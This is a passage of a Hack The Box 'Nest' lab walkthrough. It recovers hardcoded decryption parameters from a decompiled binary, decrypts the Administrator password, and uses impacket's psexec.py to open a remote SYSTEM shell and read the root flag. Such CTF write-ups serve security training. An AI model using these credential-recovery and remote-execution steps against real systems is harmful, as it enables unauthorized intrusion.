[ 10.10.14.13/23 ] [ /dev/pts/23 ] [~/HTB/Nest]
→ git clone https://github.com/icsharpcode/ILSpy
[ 10.10.14.13/23 ] [ /dev/pts/23 ] [HTB/Nest/ILSpy]
→ git submodule update --init --recursive
Submodule 'ILSpy-tests' (https://github.com/icsharpcode/ILSpy-tests) registered for path 'ILSpy-tests'
Cloning into '/home/nothing/HTB/Nest/ILSpy/ILSpy-tests'...
Submodule path 'ILSpy-tests': checked out 'aa8f1197e6a513bcc10bcc38ec7d2143d27a2246'
And from there, you decompile the HqkLdap.exe binary file, and get the following parameters from the reversed code:
#passPhrase = 667912
#saltValue = 1313Rf99
#passwordIterations = 3
#initVector = 1L1SA61493DRV53Z
#keySize = 256
Just like before we change the decrypt.cs code to have the aforementionned values, and we decrypt the password:
Then we compile it, and run it:
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ mcs decrypt.cs
[ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
→ ./decrypt.exe
Plaintext: XtH4nkS4Pl4y1nGX
And that's it ! We managed to get the Administrator password. So let's get onto the box using psexec.py:
[ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
→ locate psexec.py
/home/nothing/HTB/Forest/impacket/build/scripts-3.9/psexec.py
/home/nothing/HTB/Forest/impacket/examples/psexec.py
/usr/local/bin/psexec.py
/usr/local/lib/python3.9/dist-packages/impacket-0.9.23.dev1+20210519.170900.2f5c2476-py3.9.egg/EGG-INFO/scripts/psexec.py
/usr/share/doc/python3-impacket/examples/psexec.py
/usr/share/powershell-empire/lib/modules/powershell/lateral_movement/invoke_psexec.py
/usr/share/set/src/fasttrack/psexec.py
[ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
→ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:XtH4nkS4Pl4y1nGX@10.10.10.178
Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file xKwELIZm.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service mWKI on 10.10.10.178.....
[*] Starting service mWKI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>systeminfo
Host Name: HTB-NEST
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00477-179-0000007-84361
Original Install Date: 8/5/2019, 9:22:30 PM
System Boot Time: 5/28/2021, 7:32:37 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,546 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,653 MB
Virtual Memory: In Use: 442 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 68 Hotfix(s) Installed.
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.178
[02]: fe80::f144:55c1:5e8a:4cbd
[03]: dead:beef::f144:55c1:5e8a:4cbd
C:\Windows\system32>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
65XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
Here we can see the progress graph :
